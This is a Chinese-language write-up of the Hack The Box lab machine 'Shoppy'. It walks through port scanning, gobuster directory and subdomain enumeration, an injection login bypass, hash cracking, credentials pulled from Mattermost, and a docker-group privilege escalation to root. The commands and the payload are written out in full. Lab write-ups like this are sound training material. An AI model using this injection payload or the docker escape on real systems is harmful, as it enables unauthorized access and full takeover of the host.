HTB靶机:Shoppy

靶机信息:

image-20220926104845672

信息收集:

rustscan -a 10.10.11.180 -- -sC -sV -oN namp

image-20220926105600549

有22,80端口

使用ip访问发现需要绑定host:

echo '10.10.11.180 shoppy.htb'|sudo tee -a /etc/hosts

image-20220926105348020

进行目录爆破;

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u  http://shoppy.htb

image-20220926110138895

登录存在sql注入,使用以下语句即可绕过

admin' || 'a'=='a

image-20220926110300206

image-20220926110942731

使用相同语句,在exports功能获取到一串json数据

_id	"62db0e93d6d6a999a66ee67a"
username	"admin"
password	"23c6877d9e2b564ef8b32c3a23de27b2"
_id	"62db0e93d6d6a999a66ee67b"
username	"josh"
password	"6ebcea65320589ca4f2f1ce039975995"

使用https://crackstation.net/成功爆破出一个`josh`密码为`remembermethisway`

但很可惜不是ssh登录密码;继续信息收集

gobuster vhost -u http://shoppy.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt

存在一个http://mattermost.shoppy.htb/子域名

image-20220926114842443

image-20220926112529113

使用刚刚爆破出来的josh:remembermethisway登录;获取到ssh账号密码

username: jaeger
password: Sh0ppyBest@pp!

成功获取user.txt

image-20220926112823691

image-20220926113020967

提权

sudo -l

image-20220926113208774

获取到deploy用户的密码Sample

cat /home/deploy/password-manager

image-20220926113446344

尝试获取deploy的密码为Deploying@pp!

image-20220926113944571

登录到deploy用户发现他在docker用户组中,在网站查找https://gtfobins.github.io/gtfobins/docker/直接提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

image-20220926114527079

image-20220926114633055

总结

这台靶机主要一个关键点就是子域名的搜索,只要找到http://mattermost.shoppy.htb/这个子域名,后面的操作就很常规。

image-20220925094411425